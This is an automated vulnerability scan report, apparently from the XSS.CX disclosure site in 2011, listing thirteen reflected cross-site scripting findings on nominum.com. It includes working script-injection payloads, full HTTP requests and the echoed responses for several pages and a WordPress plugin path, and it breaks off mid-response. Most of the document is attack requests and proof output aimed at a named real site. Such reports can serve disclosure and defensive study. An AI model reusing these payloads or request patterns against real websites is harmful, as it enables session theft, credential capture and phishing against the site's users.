XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, nominum.com

Report generated by XSS.CX at Thu Sep 15 19:54:28 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

XSS in nominum.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

1.1. http://www.nominum.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.nominum.com/ [s parameter]

1.3. http://www.nominum.com/ [searchsubmit parameter]

1.4. http://www.nominum.com/how-we-do-it/dynamic-improvement [name of an arbitrarily supplied request parameter]

1.5. http://www.nominum.com/how-we-do-it/policy [name of an arbitrarily supplied request parameter]

1.6. http://www.nominum.com/how-we-do-it/security-layer [name of an arbitrarily supplied request parameter]

1.7. http://www.nominum.com/who-we-are [name of an arbitrarily supplied request parameter]

1.8. http://www.nominum.com/who-we-are/executive-team [name of an arbitrarily supplied request parameter]

1.9. http://www.nominum.com/who-we-are/thought-leadership [name of an arbitrarily supplied request parameter]

1.10. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 1]

1.11. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 2]

1.12. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 3]

1.13. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 4]

2. Cross-domain Referer leakage

3. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 13 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.nominum.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3fe"><script>alert(1)</script>a242a59de7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c3fe\"><script>alert(1)</script>a242a59de7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=xss&searchsubmit=&7c3fe"><script>alert(1)</script>a242a59de7f=1 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.1.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:11:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/?s=xss&searchsubmit=&7c3fe\"><script>alert(1)</script>a242a59de7f=1" />
...[SNIP]...

1.2. http://www.nominum.com/ [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d7b"><script>alert(1)</script>461fa4e25c2 was submitted in the s parameter. This input was echoed as 97d7b\"><script>alert(1)</script>461fa4e25c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=xss97d7b"><script>alert(1)</script>461fa4e25c2&searchsubmit= HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.1.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:09:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/?s=xss97d7b\"><script>alert(1)</script>461fa4e25c2&searchsubmit=" />
...[SNIP]...

1.3. http://www.nominum.com/ [searchsubmit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /

Issue detail

The value of the searchsubmit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14896"><script>alert(1)</script>d25c86ff81f was submitted in the searchsubmit parameter. This input was echoed as 14896\"><script>alert(1)</script>d25c86ff81f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=xss&searchsubmit=14896"><script>alert(1)</script>d25c86ff81f HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.1.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:11:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/?s=xss&searchsubmit=14896\"><script>alert(1)</script>d25c86ff81f" />
...[SNIP]...

1.4. http://www.nominum.com/how-we-do-it/dynamic-improvement [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /how-we-do-it/dynamic-improvement

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3145e"><script>alert(1)</script>e0591e4e7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3145e\"><script>alert(1)</script>e0591e4e7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /how-we-do-it/dynamic-improvement?3145e"><script>alert(1)</script>e0591e4e7f=1 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/how-we-do-it/security-layer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.5.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:12:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/how-we-do-it/dynamic-improvement?3145e\"><script>alert(1)</script>e0591e4e7f=1" />
...[SNIP]...

1.5. http://www.nominum.com/how-we-do-it/policy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /how-we-do-it/policy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8f70"><script>alert(1)</script>4c362820896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8f70\"><script>alert(1)</script>4c362820896 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /how-we-do-it/policy?e8f70"><script>alert(1)</script>4c362820896=1 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/who-we-are
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.4.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:12:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/how-we-do-it/policy?e8f70\"><script>alert(1)</script>4c362820896=1" />
...[SNIP]...

1.6. http://www.nominum.com/how-we-do-it/security-layer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /how-we-do-it/security-layer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e7c"><script>alert(1)</script>8bf26a5c100 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52e7c\"><script>alert(1)</script>8bf26a5c100 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /how-we-do-it/security-layer?52e7c"><script>alert(1)</script>8bf26a5c100=1 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/who-we-are
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.4.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:12:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/how-we-do-it/security-layer?52e7c\"><script>alert(1)</script>8bf26a5c100=1" />
...[SNIP]...

1.7. http://www.nominum.com/who-we-are [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /who-we-are

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 403ac"><script>alert(1)</script>d3e37fecbe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 403ac\"><script>alert(1)</script>d3e37fecbe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /who-we-are?403ac"><script>alert(1)</script>d3e37fecbe9=1 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/?s=dns+ip+cidr&searchsubmit=Find
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.3.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:11:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/who-we-are?403ac\"><script>alert(1)</script>d3e37fecbe9=1" />
...[SNIP]...

1.8. http://www.nominum.com/who-we-are/executive-team [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /who-we-are/executive-team

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2ba"><script>alert(1)</script>8280b6bb098 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f2ba\"><script>alert(1)</script>8280b6bb098 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /who-we-are/executive-team?5f2ba"><script>alert(1)</script>8280b6bb098=1 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/who-we-are
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.4.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:11:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/who-we-are/executive-team?5f2ba\"><script>alert(1)</script>8280b6bb098=1" />
...[SNIP]...

1.9. http://www.nominum.com/who-we-are/thought-leadership [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /who-we-are/thought-leadership

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5943a"><script>alert(1)</script>a33f9560b15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5943a\"><script>alert(1)</script>a33f9560b15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /who-we-are/thought-leadership?5943a"><script>alert(1)</script>a33f9560b15=1 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/?s=dns+ip+cidr&searchsubmit=Find
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.3.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:11:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input id="url" type="hidden" value="www.nominum.com/who-we-are/thought-leadership?5943a\"><script>alert(1)</script>a33f9560b15=1" />
...[SNIP]...

1.10. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nominum.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5ad34(a)679b0fcb5b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content5ad34(a)679b0fcb5b7/plugins/tabbed-widgets/tabbed-widgets.php?returnjs=true&ver=3.0 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:08:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: private
Expires: Wed, 12 Sep 2012 13:08:12 GMT
Cache-Control: max-age=31356000, must-revalidate
Connection: close
Content-Type: application/x-javascript
Content-Length: 46897

var $rotateoptions = new Array();
$rotateoptions[2] = new Array();
$rotateoptions[2]["style"] = "tabs";
$rotateoptions[2]["rotate"] = 0;
$rotateoptions[2]["random_start"] = 0;
$rotateoptions[2]["start
...[SNIP]...
<title>Nothing found for Wp-content5ad34(a)679b0fcb5b7 Plugins Tabbed-widgets Tabbed-widgets Php?returnjs=true&amp;ver=3 0</title>
...[SNIP]...

1.11. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nominum.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5f8a3(a)042e63b1446 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins5f8a3(a)042e63b1446/tabbed-widgets/tabbed-widgets.php?returnjs=true&ver=3.0 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:08:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: private
Expires: Wed, 12 Sep 2012 13:08:31 GMT
Cache-Control: max-age=31356000, must-revalidate
Connection: close
Content-Type: application/x-javascript
Content-Length: 46897

var $rotateoptions = new Array();
$rotateoptions[2] = new Array();
$rotateoptions[2]["style"] = "tabs";
$rotateoptions[2]["rotate"] = 0;
$rotateoptions[2]["random_start"] = 0;
$rotateoptions[2]["start
...[SNIP]...
<title>Nothing found for Wp-content Plugins5f8a3(a)042e63b1446 Tabbed-widgets Tabbed-widgets Php?returnjs=true&amp;ver=3 0</title>
...[SNIP]...

1.12. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nominum.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1d19b(a)6fe58b0aa59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/tabbed-widgets1d19b(a)6fe58b0aa59/tabbed-widgets.php?returnjs=true&ver=3.0 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:08:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: private
Expires: Wed, 12 Sep 2012 13:08:36 GMT
Cache-Control: max-age=31356000, must-revalidate
Connection: close
Content-Type: application/x-javascript
Content-Length: 46897

var $rotateoptions = new Array();
$rotateoptions[2] = new Array();
$rotateoptions[2]["style"] = "tabs";
$rotateoptions[2]["rotate"] = 0;
$rotateoptions[2]["random_start"] = 0;
$rotateoptions[2]["start
...[SNIP]...
<title>Nothing found for Wp-content Plugins Tabbed-widgets1d19b(a)6fe58b0aa59 Tabbed-widgets Php?returnjs=true&amp;ver=3 0</title>
...[SNIP]...

1.13. http://www.nominum.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 4]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nominum.com
Path:   /wp-content/plugins/tabbed-widgets/tabbed-widgets.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4e9d9(a)7887aa701e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/tabbed-widgets/tabbed-widgets.php4e9d9(a)7887aa701e1?returnjs=true&ver=3.0 HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:08:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: private
Expires: Wed, 12 Sep 2012 13:08:44 GMT
